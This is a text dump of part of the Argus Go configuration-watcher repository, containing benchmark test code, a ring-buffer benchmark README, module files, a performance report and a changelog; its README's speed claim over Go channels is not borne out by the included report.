		b.Fatalf("Failed to start watcher: %v", err)
	}
	defer func() {
		if err := watcher.Stop(); err != nil {
			b.Errorf("Failed to stop watcher: %v", err)
		}
	}()

	b.ResetTimer()
	for i := 0; i < b.N; i++ {
		if _, err := watcher.getStat(tmpFile.Name()); err != nil {
			b.Logf("Failed to get stat: %v", err)
		} // Always cache miss
	}
}

func BenchmarkWatcherPollFiles(b *testing.B) {
	tmpDir, err := os.MkdirTemp("", "argus_bench_")
	if err != nil {
		b.Fatalf("Failed to create temp dir: %v", err)
	}
	defer func() {
		if err := os.RemoveAll(tmpDir); err != nil {
			b.Errorf("Failed to remove tmpDir: %v", err)
		}
	}()

	// Create test files
	for i := 0; i < 5; i++ {
		testFile := filepath.Join(tmpDir, fmt.Sprintf("test%d.json", i))
		if err := os.WriteFile(testFile, []byte(`{"test": true}`), 0644); err != nil {
			b.Fatalf("Failed to create test file: %v", err)
		}
	}

	watcher := New(Config{PollInterval: time.Millisecond})
	if err := watcher.Start(); err != nil {
		b.Fatalf("Failed to start watcher: %v", err)
	}
	defer func() {
		if err := watcher.Stop(); err != nil {
			b.Errorf("Failed to stop watcher: %v", err)
		}
	}()

	// Add some files to watch
	files, _ := os.ReadDir(tmpDir)
	for _, file := range files {
		if !file.IsDir() {
			if err := watcher.Watch(tmpDir+"/"+file.Name(), func(event ChangeEvent) {}); err != nil {
				b.Logf("Failed to watch file: %v", err)
			}
		}
	}

	b.ResetTimer()
	for i := 0; i < b.N; i++ {
		watcher.pollFiles()
	}
}

// Test parser for benchmarks
type testParserForBenchmark struct{}

func (p *testParserForBenchmark) Parse(data []byte) (map[string]interface{}, error) {
	// Simple fast parser for benchmarking
	return map[string]interface{}{
		"benchmark": "test",
		"data_size": len(data),
	}, nil
}

func (p *testParserForBenchmark) Supports(format ConfigFormat) bool {
	return format == FormatYAML
}

func (p *testParserForBenchmark) Name() string {
	return "Benchmark Test Parser"
}

```

## /benchmarks/README.md

# Argus Ring Buffer Performance Benchmarks

This directory contains isolated performance benchmarks for the BoreasLite ring buffer implementation used in Argus. The benchmarks are separated from the main test suite to provide accurate performance measurements without interference from intensive unit tests.

## Benchmark Results

All benchmarks were executed on AMD Ryzen 5 7520U.

### Single Event Processing (Optimized Path)
```
BenchmarkBoreasLite_SingleEvent-8    47011258    25.63 ns/op    39.02 Mops/sec    0 B/op    0 allocs/op
```
- **Latency**: 25.63 nanoseconds per operation
- **Throughput**: 39.02 million operations per second
- **Memory**: Zero allocations in hot path

### Write Operations
```
BenchmarkBoreasLite_WriteFileEvent-8    67764067    53.20 ns/op    18.80 Mops/sec    0 B/op    0 allocs/op
```
- **Latency**: 53.20 nanoseconds per operation
- **Throughput**: 18.80 million operations per second
- **Memory**: Zero allocations

### Multi-Producer Single Consumer (MPSC)
```
BenchmarkBoreasLite_MPSC-8    31231618    34.77 ns/op    28.76 Mops/sec    0 B/op    0 allocs/op
```
- **Latency**: 34.77 nanoseconds per operation under concurrent load
- **Throughput**: 28.76 million operations per second
- **Scalability**: Performance maintained across multiple producers

### Comparison with Go Channels

#### BoreasLite
```
BenchmarkBoreasLite_vsChannels/BoreasLite-8    23317405    45.72 ns/op    21.87 Mops/sec    0 B/op    0 allocs/op
```

#### Go Channels
```
BenchmarkBoreasLite_vsChannels/GoChannels-8    18621222    61.43 ns/op    16.28 Mops/sec    0 B/op    0 allocs/op
```

#### Performance Delta
- **BoreasLite**: 21.87 million ops/sec
- **Go Channels**: 16.28 million ops/sec
- **Improvement**: 34.3% faster than native Go channels

### High Throughput Sustained Load
```
BenchmarkBoreasLite_HighThroughput-8    27012850    53.88 ns/op    18.56 Mops/sec    0 B/op    0 allocs/op
```
- **Sustained throughput**: 18.56 million operations per second
- **Buffer size**: 8192 events
- **Strategy**: Large batch optimization

## Technical Implementation

### Ring Buffer Architecture
- **Type**: Multiple Producer Single Consumer (MPSC)
- **Synchronization**: Lock-free atomic operations
- **Memory Layout**: Cache-line aligned, power-of-2 sizing
- **Event Size**: 128 bytes (2 cache lines)

### Optimization Strategies
1. **SingleEvent**: Ultra-low latency for 1-2 files (25ns)
2. **SmallBatch**: Balanced performance for 3-20 files
3. **LargeBatch**: High throughput for 20+ files with 4x unrolling

### Memory Characteristics
- **Zero allocations** in all hot paths
- **Fixed memory footprint**: 8KB + (128 bytes × buffer_size)
- **Cache efficiency**: Power-of-2 ring buffer with atomic sequence numbers

## Running Benchmarks

Execute all benchmarks:
```bash
go test -bench="BenchmarkBoreasLite.*" -run=^$ -benchmem
```

Execute specific benchmark:
```bash
go test -bench=BenchmarkBoreasLite_SingleEvent -run=^$ -benchmem
```

Execute with multiple iterations:
```bash
go test -bench="BenchmarkBoreasLite.*" -run=^$ -benchmem -count=3
```

## Dependencies

- `github.com/agilira/argus`: Main library (via replace directive)
- `github.com/agilira/go-timecache`: High-performance timestamp caching

## Notes

- Benchmarks use minimal processing functions to isolate ring buffer performance
- All measurements include complete write-to-process cycles where applicable
- MPSC benchmarks use GOMAXPROCS concurrent producers
- Results represent sustainable performance under continuous load

## /benchmarks/go.mod

```mod path="/benchmarks/go.mod" 
module github.com/agilira/argus/benchmarks

go 1.23.11

require (
	github.com/agilira/argus v0.0.0
	github.com/agilira/go-timecache v1.0.2
)

require (
	github.com/agilira/flash-flags v1.1.5 // indirect
	github.com/agilira/go-errors v1.1.0 // indirect
	github.com/mattn/go-sqlite3 v1.14.32 // indirect
)

replace github.com/agilira/argus => ../

replace github.com/agilira/go-timecache => ../../go-timecache

```

## /benchmarks/go.sum

```sum path="/benchmarks/go.sum" 
github.com/agilira/flash-flags v1.1.5 h1:wCYtbmNfqDyDO5J3qE32rRnVLh+8hm0pKNTTmCemR50=
github.com/agilira/flash-flags v1.1.5/go.mod h1:vuuo9FRN+ZgREaa1WYRmUFac/h3+CwuvD4EvjF5JNIQ=
github.com/agilira/go-errors v1.1.0 h1:97cBNEDo6q2pKzkr/YqlqWq3fa5rOU8E4LOnSsCmWck=
github.com/agilira/go-errors v1.1.0/go.mod h1:YEeM2sVXg2w/GmDVZ2m2nH2kJ2Aa34OvbTA6w3JzVbY=
github.com/mattn/go-sqlite3 v1.14.32 h1:JD12Ag3oLy1zQA+BNn74xRgaBbdhbNIDYvQUEuuErjs=
github.com/mattn/go-sqlite3 v1.14.32/go.mod h1:Uh1q+B4BYcTPb+yiD3kU8Ct7aC0hY9fxUwlHK0RXw+Y=

```

## /benchmarks/performance-report-20251016.txt

=== Argus Framework Performance Report ===
Generated: Thu 16 Oct 2025 12:13:49 AM CEST
System: Linux agilira 6.14.0-33-generic #33~24.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Sep 19 17:02:30 UTC 2 x86_64 x86_64 x86_64 GNU/Linux
Go Version: go version go1.25.1 linux/amd64

=== Benchmark Results ===
=== RUN   TestDummy
--- PASS: TestDummy (0.00s)
goos: linux
goarch: amd64
pkg: github.com/agilira/argus/benchmarks
cpu: AMD Ryzen 5 7520U with Radeon Graphics         
BenchmarkBoreasLite_SingleEvent
BenchmarkBoreasLite_SingleEvent-8      	47891098	        24.82 ns/op	        40.29 Mops/sec	       0 B/op	       0 allocs/op
BenchmarkBoreasLite_WriteFileEvent
BenchmarkBoreasLite_WriteFileEvent-8   	17755099	        69.37 ns/op	        14.42 Mops/sec	       0 B/op	       0 allocs/op
BenchmarkBoreasLite_MPSC
BenchmarkBoreasLite_MPSC-8             	32280844	        34.90 ns/op	        28.66 Mops/sec	       0 B/op	       0 allocs/op
BenchmarkBoreasLite_vsChannels
BenchmarkBoreasLite_vsChannels/BoreasLite
BenchmarkBoreasLite_vsChannels/BoreasLite-8         	20718548	        65.42 ns/op	        15.29 Mops/sec	       0 B/op	       0 allocs/op
BenchmarkBoreasLite_vsChannels/GoChannels
BenchmarkBoreasLite_vsChannels/GoChannels-8         	25734517	        45.12 ns/op	        22.16 Mops/sec	       0 B/op	       0 allocs/op
BenchmarkBoreasLite_HighThroughput
BenchmarkBoreasLite_HighThroughput-8                	21934914	        80.18 ns/op	        12.47 Mops/sec	       0 B/op	       0 allocs/op
PASS
ok  	github.com/agilira/argus/benchmarks	9.005s

=== Consistency Test (3 runs) ===
goos: linux
goarch: amd64
pkg: github.com/agilira/argus/benchmarks
cpu: AMD Ryzen 5 7520U with Radeon Graphics         
BenchmarkBoreasLite_SingleEvent-8   	95769669	        24.72 ns/op	        40.46 Mops/sec	       0 B/op	       0 allocs/op
BenchmarkBoreasLite_SingleEvent-8   	96379674	        25.08 ns/op	        39.87 Mops/sec	       0 B/op	       0 allocs/op
BenchmarkBoreasLite_SingleEvent-8   	97728352	        24.77 ns/op	        40.37 Mops/sec	       0 B/op	       0 allocs/op
PASS
ok  	github.com/agilira/argus/benchmarks	7.298s


## /changelog/v1.0.3.txt

# Changelog - Version 1.0.3

## Release Date
2025-10-15

## Summary
Added Isolated benchmark suite, and enhanced security tooling.

## Benchmarks Added
- Isolated benchmark suite in `/benchmarks` directory
- Dedicated go.mod to prevent test interference
- 5 benchmark scenarios covering different workloads
- Performance comparison vs Go channels and callbacks

## Security
- Added `govulncheck` vulnerability scanning
- Integrated `go mod verify` for dependency integrity
- Enhanced CI/CD pipeline with security checks
- Updated both Makefile and Makefile.ps1

## Build Tools
- New Makefile targets: `vulncheck`, `mod-verify`, `status`
- PowerShell equivalents in Makefile.ps1
- Enhanced `check` command with security validation
- Automated tool installation verification

## Infrastructure
- GitHub Actions workflow updated with vulnerability scanning
- Benchmark isolation prevents performance measurement interference
- Cross-platform build script enhancements
- Development tool status checking

## Files Added
- `benchmarks/go.mod`
- `benchmarks/ring_buffer_performance_test.go`
- `changelog/v1.0.3.txt`

## Files Modified
- `Makefile`
- `Makefile.ps1`
- `.github/workflows/ci.yml`

## Breaking Changes
None.

## Compatibility
Full backward compatibility maintained.

## /examples/cli/go.mod

```mod path="/examples/cli/go.mod" 
module github.com/agilira/argus/examples/cli

go 1.25.1

require github.com/agilira/argus v1.0.2

require (
	github.com/agilira/flash-flags v1.1.5 // indirect
	github.com/agilira/go-errors v1.1.0 // indirect
	github.com/agilira/go-timecache v1.0.2 // indirect
	github.com/agilira/orpheus v1.1.10 // indirect
	github.com/mattn/go-sqlite3 v1.14.32 // indirect
)

replace github.com/agilira/argus => ../../

```

## /examples/config_binding/go.mod

```mod path="/examples/config_binding/go.mod" 
module config_binding_example

go 1.23.11

toolchain go1.24.5

replace github.com/agilira/argus => ../..

require github.com/agilira/argus v0.0.0-00010101000000-000000000000

require (
	github.com/agilira/flash-flags v1.1.5 // indirect
	github.com/agilira/go-errors v1.1.0 // indirect
	github.com/agilira/go-timecache v1.0.2 // indirect
	github.com/mattn/go-sqlite3 v1.14.32 // indirect
)

```


The content has been capped at 50000 tokens. The user could consider applying other filters to refine the result. The better and more specific the context, the better the LLM can follow instructions. If the context seems verbose, the user can refine the filter using uithub. Thank you for using https://uithub.com - Perfect LLM context for any GitHub repo.
Copied!